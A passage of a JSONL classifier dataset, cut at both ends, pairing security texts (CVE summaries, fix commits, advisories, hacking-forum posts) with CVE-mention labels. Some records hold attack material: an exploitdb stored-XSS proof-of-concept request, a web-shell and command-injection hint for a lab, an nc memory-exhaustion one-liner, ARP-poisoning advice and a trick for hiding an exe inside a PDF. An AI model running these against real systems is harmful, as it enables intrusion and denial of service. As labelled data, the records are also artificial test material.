"f80001daa7a5373b03ae", "text": "CVE: CVE-2022-0704\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.4.0.'}]\n\nFix commit: [Admin] Security - Add handler to enable Content Security Policy (#11447)\n\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - fix document preview\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - add docs\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - review changes\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - review changes\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - review changes\r\n\r\n* [Admin] Security - Add handler to enable Content Security Policy - review changes\r\n\r\n* added missing config node + micro optimizations\r\n\r\nCo-authored-by: Bernhard Rusch ", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "722039ed387801f23dfc", "text": "Thanks for both the question and the clarification. The question is incorrect in that it is asking for something other than what it wants. It asks for the address of EBP when it wants the value (pattern) within EBP. Other people have reported this and the question should really be fixed. An aside, IMHO, a better question would be to ask for the pattern offset of EBP. Determining the correct pattern offset implies the student knows both how to examine EBP’s value as well as apply other techniques outlined within the lesson. To be clear, I am really enjoying the module, and other modules in the path, but wanted to share my two cents on this.", "source": "hackthebox", "timestamp": "2022-10-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e1fe5c15a522ff621778", "text": "I messed up by having burp running and not the whole website loaded. Remember to disable burp when you visit the website for the first time", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "726a343f0fbd0f424a51", "text": "none of the android rooting software for windows is paid software. the flashing software is free for each and every make of android phone, for example Odin or Fastboot, and you only need a phone with an unlockable boot loader and whatever applicable firmware supports your device. these are all free and can be easily found online. Rooting any android devices requires that the device has an unlockable bootloader you download the correct flash software and firmware thats all. I will not list where to find these tools because it is easily searchable. Also you should seriously consider why you need a rooted device to begin with, unless you need root access to androids kernel there is literally no need for root.", "source": "parrotsec", "timestamp": "2023-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f631e0e38134999a5eec", "text": "CVE: CVE-2021-3020\n\n[{'lang': 'en', 'value': 'An issue was discovered in ClusterLabs Hawk (aka HA Web Konsole) through 2.3.0-15. It ships the binary hawk_invoke (built from tools/hawk_invoke.c), intended to be used as a setuid program. This allows the hacluster user to invoke certain commands as root (with an attempt to limit this to safe combinations). This user is able to execute an interactive \"shell\" that isn\\'t limited to the commands specified in hawk_invoke, allowing escalation to root.'}]\n\nFix commit: Fix: bootstrap: setup authorized ssh access for hacluster(CVE-2020-35459, bsc#1179999; CVE-2021-3020, bsc#1180571)", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "73d3f203b2be08b7b026", "text": "Look at the conversations between IP addresses. Like one of the replies stated, at some point the user has to log in.", "source": "hackthebox", "timestamp": "2022-02-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7a4cb533e5c08fb6ff10", "text": "If you know there is a stranger IPhone on your network, you can just install NetCut on Windows OS, which has a Free version forever and ARP Poison and Jail the IPhone on your network. Also you could Log into your Router and Black-List that IPhones IP or Mac Address and Keep an eye out on what happens and How many devices are connected to the Network. Computers/Phones/Tablets/IOT/Cast-Devices/Wifi-Extenders.", "source": "hackersploit", "timestamp": "2022-10-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "819d0de3d34c02ae63ac", "text": "What is the latest and working method or script to view real IP of a site behind Cloudflare\n\nPlease who can help me with the working script to view real IP of a site using Cloudflare, all the script I got from GitHub doesn’t work any longer", "source": "hackersploit", "timestamp": "2022-03-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "978762886e8d85ac423c", "text": "Hey! can you give me a hint for finding the employee name? Cant find it. look at conversations, used ctr+F to filter by string Credent, auth, user or name as the packet details and nothing.", "source": "hackthebox", "timestamp": "2022-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5d41cbd05e2ed3a36644", "text": "This is a good advice, also make sure to use the -u flag, to test every username for every for every password row instead of the other way around.", "source": "hackthebox", "timestamp": "2022-04-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1062dfb33f1d534ea9d5", "text": "CVE: CVE-2022-2289\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository vim/vim prior to 9.0.'}]\n\nFix commit: patch 9.0.0026: accessing freed memory with diff put\n\nProblem: Accessing freed memory with diff put.\nSolution: Bail out when diff pointer is no longer valid.", "source": "cvefixes", "timestamp": "2022-07-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7b98960221a82a6e975a", "text": "[Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')] CVE-2023-28320 - siglongjmp race condition\n\nlibcurl provides several different backends for resolving host names, selected at build time. If it is built to use the synchronous resolver, it allows name resolves to time-out slow operations using alarm() and siglongjmp().\n\nWhen doing this, libcurl used a global buffer that was not mutex protected and a multi-threaded application might therefore crash or otherwise misbehave.\n\n## Impact\n\nDenial of service due to a crash (likely) or possibly other impacts.", "source": "hackerone", "timestamp": "2023-05-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d78b0ba81789fe3f9ec3", "text": "WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS\n\n# Exploit Title: WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS\n# Date: 2/27/2021\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/easy-cookies-policy/\n# Version: 1.6.2\n# Tested on: Windows 10\n# CVE: CVE-2021-24405\n\n1. Description:\nBroken access control allows any authenticated user to change the cookie banner through a POST request to admin-ajax.php.\nIf users can't register, this can be done through CSRF.\n\n2. Proof of Concept:\nPOST http://localhost/wp-admin/admin-ajax.php HTTP/1.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nReferer: http://localhost/wp-admin/options-general.php?page=easy-cookies-policy\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 226\nOrigin: http://localhost\nConnection: keep-alive\nHost: localhost\nCookie: [Any authenticated user]\n\naction=easy_cookies_policy_save_settings&maintext=&background=black&transparency=90&close=accept&expires=365&enabled=true&display=fixed&position=top&button_text=Accept&text_color=#dddddd", "source": "exploitdb", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5c5ea06c15b85ebc7b77", "text": "thank you for the hook up bro. much appreciated. I’ve been self training for a year. granted i have been using linux (ubuntu) since 16.04 into 18.04 way back in 2011 then stopped using linux until a year ago. picked up a pretty decent machine then installed ubuntu 20.04 so i can freshen up my skills. i’ve been researching and practicing for about 9 months on hacking and now ready for parrot (i think). so this little bit of info is awesome! Excited to start my journey in Parrot Sec OS. if anyone has any tips please please please, i’d love to hear from you. Thanks, roguebandit", "source": "parrotsec", "timestamp": "2022-03-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0b8f11b3c187397414b6", "text": "If anybody is having issues with part 2 of Skill Assessment-Service Login, follow the HTB Academy steps for FTP Brute Forcing very closely. The best tip I can give you is to be patient because it can take a while for the brute force to work", "source": "hackthebox", "timestamp": "2022-03-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6022a5d1e18ada916f8c", "text": "Deserialization of Untrusted Data in apache-submarine\n\n[Severity: CRITICAL]\n\nApache Software Foundation Apache Submarine has a bug when serializing against yaml. The bug is caused by snakeyaml https://nvd.nist.gov/vuln/detail/CVE-2022-1471 .\n\nApache Submarine uses JAXRS to define REST endpoints. In order to\nhandle YAML requests (using application/yaml content-type), it defines\na YamlEntityProvider entity provider that will process all incoming\nYAML requests. In order to unmarshal the request, the readFrom method\nis invoked, passing the entityStream containing the user-supplied data in `submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java`.\n \nWe have now fixed this issue in the new version by replacing to `jackson-dataformat-yaml`.\nThis issue affects Apache Submarine: from 0.7.0 before 0.8.0. Users are recommended to upgrade to version 0.8.0, which fixes this issue.\nIf using the version smaller than 0.8.0 and not want to upgrade, you can try cherry-pick PR https://github.com/apache/submarine/pull/1054 and rebuild the submart-server image to fix this.\n\n", "source": "github_advisory", "timestamp": "2023-11-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f10b65aa6209f70911f7", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka \"Chakra Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8617, CVE-2018-8618, CVE-2018-8624, CVE-2018-8629.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "58761e3371de6602677a", "text": "ss -l -4 | tr “.” \" \" | column -t | grep LISTEN | grep -v “127” | wc -l worked for me all fine tr - replaces the dots with spaces column separates everything into columns grep then we filter LISTEN grep -v filters out 127 wc gives you your answerr", "source": "hackthebox", "timestamp": "2023-05-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "011f2c92d2d361cd1535", "text": "[Improper Access Control - Generic] CVE-2023-40611: Apache Airflow Dag Runs Broken Access Control Vulnerability\n\n##Description:\n\nApache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc.\n\nUsers should upgrade to version 2.7.1 or later which has removed the vulnerability.\n\n##Vulnerability Exploitation:\n\n1.Select Browse-->DAG Runs, we can see the Dag Run list.\n\n{F2691945}\n\n2.Select a Dag, and edit it.\n\n{F2691944}\n\n3. We can see that the Conf parameter text box is gray and cannot be edited. The current user does not have permission to modify the Conf value.\n\n{F2691946}\n\n4.Click Save to intercept the request message and modify the parameter value of Conf to \"1111111111111\".\n\n{F2691948}\n\n5.Successfully modified beyond permission.\n\n{F2691947}\n\n## Impact\n\nBroken Access Control", "source": "hackerone", "timestamp": "2023-10-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "404d76ecbc7e9f0ae68e", "text": "Masmer: Off-topic: Ukraine’s Hacker Army Is Targeting Russia Surely we are having cyber war. But the “public” side is all about script kiddies dancing around LuL", "source": "parrotsec", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a0ee12c03be32c3ac07e", "text": "eh estado luchando con este reto, dentro de /var/www/html debes crear un archivo shell.php con el contenido ``` luego en otra terminal curl -X GET 'http://10.129.5.70/shell.php' para luego leer con cat /var/log/apache2/error.log", "source": "hackthebox", "timestamp": "2023-10-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0c306c2c09f6bf4fabdb", "text": "CVE: CVE-2022-24828\n\n[{'lang': 'en', 'value': \"Composer is a dependency manager for the PHP programming language. Integrators using Composer code to call `VcsDriver::getFileContent` can have a code injection vulnerability if the user can control the `$file` or `$identifier` argument. This leads to a vulnerability on packagist.org for example where the composer.json's `readme` field can be used as a vector for injecting parameters into hg/Mercurial via the `$file` argument, or git via the `$identifier` argument if you allow arbitrary data there (Packagist does not, but maybe other integrators do). Composer itself should not be affected by the vulnerability as it does not call `getFileContent` with arbitrary data into `$file`/`$identifier`. To the best of our knowledge this was not abused, and the vulnerability has been patched on packagist.org and Private Packagist within a day of the vulnerability report.\"}]\n\nFix commit: Merge pull request from GHSA-x7cr-6qr6-2hh6\n\n* GitDriver: filter branch names starting with a - character\n\n* GitDriver: getFileContent prevent identifiers starting with a -\n\n* HgDriver: prevent invalid identifiers and prevent file from running commands\n\n* HgDriver: filter branches starting with a - character", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b61c45bd3ae56a08ea85", "text": "The problem has been solved! On the contrary, I removed the -n flag after echo. And he gave me the correct value of the flag.", "source": "hackthebox", "timestamp": "2022-06-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2579226c8adbe632f84e", "text": "I’m just starting looking into networks and security (extremely new), however, I need to know how to gain access to an iPhone on my Wi-Fi? There seems to be an iPhone that keeps logging on my network, even though I’ve changed my password, and at this time I just want to know if there is a way for me to get in their device since they are using my Wi-Fi? Idk where else to go. TIA", "source": "hackersploit", "timestamp": "2022-06-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "43b54eb4034ab022bc1e", "text": "Post Removed\n\nForgive me I know this is a silly question but I was wondering how hackers change voices like this . I searched google my voice changed but not very realistic! I there any open-source software which does not collect data and do the required job?? Sorry but please answer me", "source": "parrotsec", "timestamp": "2022-03-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "247b2a2010f5aa900a8d", "text": "CVE: CVE-2021-32434\n\n[{'lang': 'en', 'value': 'abcm2ps v8.14.11 was discovered to contain an out-of-bounds read in the function calculate_beam at draw.c.'}]\n\nFix commit: fix: array overflow when wrong duration in voice overlay\n\nIssue #83,", "source": "cvefixes", "timestamp": "2022-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b336b49caf8dfd50315a", "text": "CVE: CVE-2022-0824\n\n[{'lang': 'en', 'value': 'Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990.'}]\n\nFix commit: Foreign module may need a check", "source": "cvefixes", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9b980f0f6078b1ab722a", "text": "It takes a combination of multiple skills and utility tools to stay anonymous online. One of which is using proxy servers to avoid being tracked. If you want to give it a try, I’d recommend storm proxies, especially because of its rotating proxies feature. Here are some storm proxies coupon to help you make a decision.", "source": "hackersploit", "timestamp": "2022-04-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b035391e978a9a5d8a74", "text": "CVE: CVE-2022-0133\n\n[{'lang': 'en', 'value': 'peertube is vulnerable to Improper Access Control'}]\n\nFix commit: Prevent caption listing of private videos", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dc3e5e13e7f3b31e0c5f", "text": "CVE: CVE-2022-31128\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In affected versions Tuleap does not properly verify permissions when creating branches with the REST API in Git repositories using the fine grained permissions. Users can create branches via the REST endpoint `POST git/:id/branches` regardless of the permissions set on the repository. This issue has been fixed in version 13.10.99.82 Tuleap Community Edition as well as in version 13.10-3 of Tuleap Enterprise Edition. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: fix: Fine grained permissions must be well handled in POST git/:id/branches\n\nThis fixes request #27538 Fine grained permissions are not checked when creating a branch with REST API\n\nThe fine grained permissions were not taken into account in the previous\nchecks.\n\nChange-Id: I1fa72ab34e4f41d5ea3ec9dd21e990ce330d780f", "source": "cvefixes", "timestamp": "2022-08-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d2a50d4a4db2746b2bd8", "text": "Hash or Enconde\n\nHello, I found in CTF this cred. ddrivermysqlhost 127.0.0.username objetivapassword:zg0hRAYjPZjP8BkiteoqTSE=::8bb53db42dcc97ae5a30f36c95ac5e3name proseleta_id361 But I dont know, how cracked the username and password. probably the username is objetiva or objetivas. Can someone help me?", "source": "hackersploit", "timestamp": "2022-07-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ea9c372819903e39a149", "text": "Yes, you can definitely learn ethical hacking from online tutorials and courses. There are numerous online resources available that can help you learn ethical hacking, such as websites, online courses, blogs, and YouTube channels. When learning ethical hacking, it's important to remember that you should only use your skills for ethical purposes and avoid any illegal or unethical activities.", "source": "go4expert", "timestamp": "2023-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "904aba0e52b5f3bf0ca8", "text": "CVE: CVE-2022-21716\n\n[{'lang': 'en', 'value': \"Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to 22.2.0, Twisted SSH client and server implement is able to accept an infinite amount of data for the peer's SSH version identifier. This ends up with a buffer using all the available memory. The attach is a simple as `nc -rv localhost 22 < /dev/zero`. A patch is available in version 22.2.0. There are currently no known workarounds.\"}]\n\nFix commit: Update the release date.", "source": "cvefixes", "timestamp": "2022-03-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4d506f7ed46dc87f1343", "text": "Looking for Free Course Content\n\nHi there! Just trying to learn the fundamentals of penetration testing hoping that someone will help me to search an online free course for me or books in pdf (or even book names with author names I\"ll try to find them in the market) or any resource for an extreme newbie with a very basic knowledge of linux . I want a comprehensive guide (or road map with resources given) on “how to start pen-testing as a beginning of career” and “how to master linux”. I hope YOU will help me in a way that I can become a Penetration Tester. THANK YOU", "source": "parrotsec", "timestamp": "2022-01-14", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "63b1a4a8dd4086cd2919", "text": "CVE: CVE-2018-25045\n\n[{'lang': 'en', 'value': 'Django REST framework (aka django-rest-framework) before 3.9.1 allows XSS because the default DRF Browsable API view templates disable autoescaping.'}]\n\nFix commit: Fix XSS caused by disabled autoescaping in the default DRF Browsable API view templates (#6330)\n\n* Add test that verifies that HTML is correctly escaped in Browsable API views\r\n\r\n* Fix `urlize_quoted_links` tag to avoid double escaping in autoescape mode\r\n\r\n* Fix XSS in default DRF Browsable API template by re-enabling autoescape", "source": "cvefixes", "timestamp": "2022-07-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9079494316fa40baa6fd", "text": "CVE: CVE-2022-23073\n\n[{'lang': 'en', 'value': \"In Recipes, versions 1.0.5 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in copy to clipboard functionality. When a victim accesses the food list page, then adds a new Food with a malicious javascript payload in the ‘Name’ parameter and clicks on the clipboard icon, an XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover.\"}]\n\nFix commit: improved output sanitization of several views", "source": "cvefixes", "timestamp": "2022-06-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5a213409f53445862b60", "text": "Hello! Have you found anything else ? I stopped working on the project and I don’t have the script rn.", "source": "hackthebox", "timestamp": "2022-11-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "303ce36f4e646e53cf88", "text": "CVE: CVE-2022-21649\n\n[{'lang': 'en', 'value': 'Convos is an open source multi-user chat that runs in a web browser. Characters starting with \"https://\" in the chat window create an
    tag. Stored XSS vulnerability using onfocus and autofocus occurs because escaping exists for \"<\" or \">\" but escaping for double quotes does not exist. Through this vulnerability, an attacker is capable to execute malicious scripts. Users are advised to update as soon as possible.'}]\n\nFix commit: Fix XSS vulnerability in links and changed I18N.md() to be understand recursive tags #281 #600 #601", "source": "cvefixes", "timestamp": "2022-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "880fd30b5778026ec9b8", "text": "Touchpad & Clicks don't work or either delay in hp laptop with Synamptic touchpad\n\nI am using parrot os on my hp notebook 15bx180tx. I have dual boot with Parrot Os with KDE Plasma on SSD and windows 10 on harddisk. It was working fine since last 1 year. But after I upgraded my ram from 8GB to 16GB. Synaptic touchpad started getting laggy, cursor moves but doesn’t click, even left and right key on touchpad don’t click. Tried installing xserver libinput, evdev, mouse and synaptics drivers for touchpad, Reinstalling Latest Version, managing speed and pressure on touch pad settings, but It doesn’t help much. SYSTEM INFO: Parrot OS 5.2 KDE Plasma version: 5.20.5 KDE Framework version: 5.78.0 Qt Version: 5.15.2 Kernel Version: 6.0.0-12parrot1-amd64 OS Type: 64-bit Hardware Processors: 8 x Intel@Core i5-8250U CPU @ 1.60GHz Memory: 15.6 GiB of Ram Graphics: Mesa Intel@ UHD Graphics 620 cat /proc/bus/input/devices I: Bus=0011 Vendor=0002 Product=0007 Version=01b1 N: Name=“SynPS/2 Synaptics TouchPad” P: Phys=isa0060/serio1/input0 S: Sysfs=/devices/platform/i8042/serio1/input/input4 U: Uniq= H: Handlers=mouse0 event4 B: PROP=1 B: EV=b B: KEY=e520 30000 0 0 0 0 B: ABS=660800011000003 └──╼ $xinput list ⎡ Virtual core pointer id=2 [master pointer (3)] ⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)] ⎜ ↳ SynPS/2 Synaptics TouchPad id=10 [slave pointer (2)] ⎣ Virtual core keyboard id=3 [master keyboard (2)] ↳ Virtual core XTEST keyboard id=5 [slave keyboard (3)] ↳ Power Button id=6 [slave keyboard (3)] ↳ Video Bus id=7 [slave keyboard (3)] ↳ HP TrueVision HD Camera: HP Tru id=8 [slave keyboard (3)] ↳ AT Translated Set 2 keyboard id=9 [slave keyboard (3)] ↳ HP WMI hotkeys id=11 [slave keyboard (3)] Without touchpad & clicks, it’s impossible to operate this laptop. Someone help me fix this issue.", "source": "parrotsec", "timestamp": "2023-02-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1fd09860edace670f173", "text": "is just because you use a VPN or AnonSurf without tracking blockers and webRTC protection but you have not been hacked.", "source": "parrotsec", "timestamp": "2023-11-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0210e25f0c7fc679c4b9", "text": "Beside Linux, I would concentrate on the typical pentest tools of nmap, Wireshark, and Metasploit. Mix it up with learning whatever tool you are interested in like Burp Suite (Web hacking), Aircrack (Wi-Fi hacking), etc. There are many videos on YouTube to learn from, just skip the annoying sponsors. The following are playlists for those tools. Nmap Wireshark Metasploit", "source": "parrotsec", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "cb1db096e890ee082fe8", "text": "open a hex editor. open your pdf in the editor. open the exe in the editor (in another window). copy the exe hex values into the pdf hex values (after pdf file end). save your new ‘pdf’, it will still open and operate as a pdf but your exe file will be there as well and you (or anyone) can extract the exe. PLEASE USE SAFELY AND LEGALLY!", "source": "hackersploit", "timestamp": "2022-03-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "10b7c3b097c70fb53a32", "text": "Hello stuck on Elasticity for 4–5 days, machine got reset I believe 1 day a go and still having the same issue connecting to the official standard port and another a bit above timing out… can someone PM me see if this is the right way because if not at least I can change my approach. Thanks", "source": "hackthebox", "timestamp": "2023-01-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c5da810f9443a77f2ccf", "text": "Privesc MonitorsTwo\n\nHello guys, i got the user access and the related flag, but i’m stuck in privesc, i did the various enumerations and i should have found a way through the containers (41091) but i can’t spawn the shell", "source": "hackthebox", "timestamp": "2023-06-13", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "158b311cb0bf25d6c582", "text": "CVE: CVE-2021-43257\n\n[{'lang': 'en', 'value': 'Lack of Neutralization of Formula Elements in the CSV API of MantisBT before 2.25.3 allows an unprivileged attacker to execute code or gain access to information when a user opens the csv_export.php generated CSV file in Excel.'}]\n\nFix commit: Escape strings to prevent CSV injection\n\nPrefixing the string with a tab when it starts with =, -, + or @.\n\nThanks to Devendra Bhatla for reporting the issue.\n\nFixes #29130, CVE-2021-43257", "source": "cvefixes", "timestamp": "2022-04-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2b89767432a95a665b31", "text": "CVE: CVE-2022-0727\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository chocobozzz/peertube prior to 4.1.0.'}]\n\nFix commit: Check video privacy when creating comments/rates", "source": "cvefixes", "timestamp": "2022-02-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "130e5441721333b63268", "text": "CVE: CVE-2022-1207\n\n[{'lang': 'en', 'value': 'Out-of-bounds read in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability allows attackers to read sensitive information from outside the allocated buffer boundary.'}]\n\nFix commit: Fix 1 byte oobread in the cris analysis plugin ##crash", "source": "cvefixes", "timestamp": "2022-04-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fe5a85ad8e588d92d465", "text": "Possible privilege escalation via bash completion script\n\n[Severity: MEDIUM]\n\nThe bash completion script for `fscrypt` through v0.3.2 allows injection of commands via crafted mountpoint paths, allowing privilege escalation under a specific set of circumstances. A local user who has control over mountpoint paths could potentially escalate their privileges if they create a malicious mountpoint path and if the system administrator happens to be using the `fscrypt` bash completion script to complete mountpoint paths. We recommend upgrading to v0.3.3 or above.\n\nFor more details, see [CVE-2022-25328](https://www.cve.org/CVERecord?id=CVE-2022-25328).", "source": "github_advisory", "timestamp": "2022-03-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0c858f3f806b896fb067", "text": "Ok, but the given server time zone might not be the real one. Try to use greater offset instead of ±1 s. For speeding things up, try to generate the given token (which can be conducted offline).", "source": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "1f3a6dc292f723fd758b", "text": "i also reversed shell but i couldn’t get rooted, can you help me?", "source": "hackthebox", "timestamp": "2022-04-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "07922641c8f9db9a19ad", "text": "CVE: CVE-2022-21706\n\n[{'lang': 'en', 'value': \"Zulip is an open-source team collaboration tool with topic-based threading. Zulip Server version 2.0.0 and above are vulnerable to insufficient access control with multi-use invitations. A Zulip Server deployment which hosts multiple organizations is vulnerable to an attack where an invitation created in one organization (potentially as a role with elevated permissions) can be used to join any other organization. This bypasses any restrictions on required domains on users' email addresses, may be used to gain access to organizations which are only accessible by invitation, and may be used to gain access with elevated privileges. This issue has been patched in release 4.10. There are no known workarounds for this issue. ### Patches _Has the problem been patched? What versions should users upgrade to?_ ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References _Are there any links users can visit to find out more?_ ### For more information If you have any questions or comments about this advisory, you can discuss them on the [developer community Zulip server](https://zulip.com/developer-community/), or email the [Zulip security team](mailto:security@zulip.com).\"}]\n\nFix commit: CVE-2022-21706: Prevent use of multiuse invites to join other orgs.\n\nThe codepaths for joining an organization via a multi-use invitation\n(accounts_home_from_multiuse_invite and maybe_send_to_registration)\nweren't validating whether\nthe organization the invite was generated for matches the organization\nthe user attempts to join - potentially allowing an attacker with access\nto organization A to generate a multi-use invite and use it to join\norganization B within the same deployment, that they shouldn't have\naccess to.", "source": "cvefixes", "timestamp": "2022-02-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "91b26bcaf9ad7c93b2bb", "text": "You are in the right direction, before click on Move you must select tmp, after you can select Move and the URL will change like that ?to=tmp&from=696212415.txt&finish=1&move=1\" Now you can try to inject your payload, try to put another sub-shell before bash and try different operators,‘&’ ‘&&’ ‘|’ ‘||’ ‘$()’ ‘``’", "source": "hackthebox", "timestamp": "2023-11-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ae11280a583c4fdadecc", "text": "protobufjs Prototype Pollution vulnerability\n\n[Severity: CRITICAL]\n\nprotobuf.js (aka protobufjs) 6.10.0 until 6.11.4 and 7.0.0 until 7.2.4 allows Prototype Pollution, a different vulnerability than CVE-2022-25878. A user-controlled protobuf message can be used by an attacker to pollute the prototype of Object.prototype by adding and overwriting its data and functions. Exploitation can involve: (1) using the function parse to parse protobuf messages on the fly, (2) loading .proto files by using load/loadSync functions, or (3) providing untrusted input to the functions ReflectionObject.setParsedOption and util.setProperty. NOTE: this CVE Record is about `Object.constructor.prototype. = ...;` whereas CVE-2022-25878 was about `Object.__proto__. = ...;` instead.", "source": "github_advisory", "timestamp": "2023-07-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "bd76647137d629adf6b1", "text": "I was just about to make a new post regarding this question but figured it out as I was making the post - After multiple attempts, I wasn’t able to enumerate the page name with the -e switch, even with the correct extension listed. Haven’t figured out why yet. Nonetheless, by manually performing the fuzz on the appropriate resource, I was able to see the page they were referring to. However, this started my biggest challenge, which was entering the answer as they preferred it. AttackingWebApplicationswithFfuf 765×178 30 KB After a successful curl and receiving the described text, I copy/pasted the URL into the answer section only to be met with an incorrect response. Thinking there may be another page, my pursuit continued. Hours later, I clicked on the HINT and realized the format they wanted it in. Argh!!!", "source": "hackthebox", "timestamp": "2022-09-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ed8392b01675b4637470", "text": "Hi, I said somewhere here not the moderators, as that mail I used here is an alias mail with VOIP number attached to it and only used here. the mail…", "source": "parrotsec", "timestamp": "2023-12-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9af4f93fb7b38ad9de1b", "text": "Yes, I used the blur spoiler markup for those not interested in the direct answer (though I assumed it could be unmasked if clicked on). Yes, I also used a different class other than BIOS as well. Glad you got it figured out!", "source": "hackthebox", "timestamp": "2022-09-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dde308561bca0c9203e9", "text": "CVE: CVE-2021-3827\n\n[{'lang': 'en', 'value': \"A flaw was found in keycloak, where the default ECP binding flow allows other authentication flows to be bypassed. By exploiting this behavior, an attacker can bypass the MFA authentication by sending a SOAP request with an AuthnRequest and 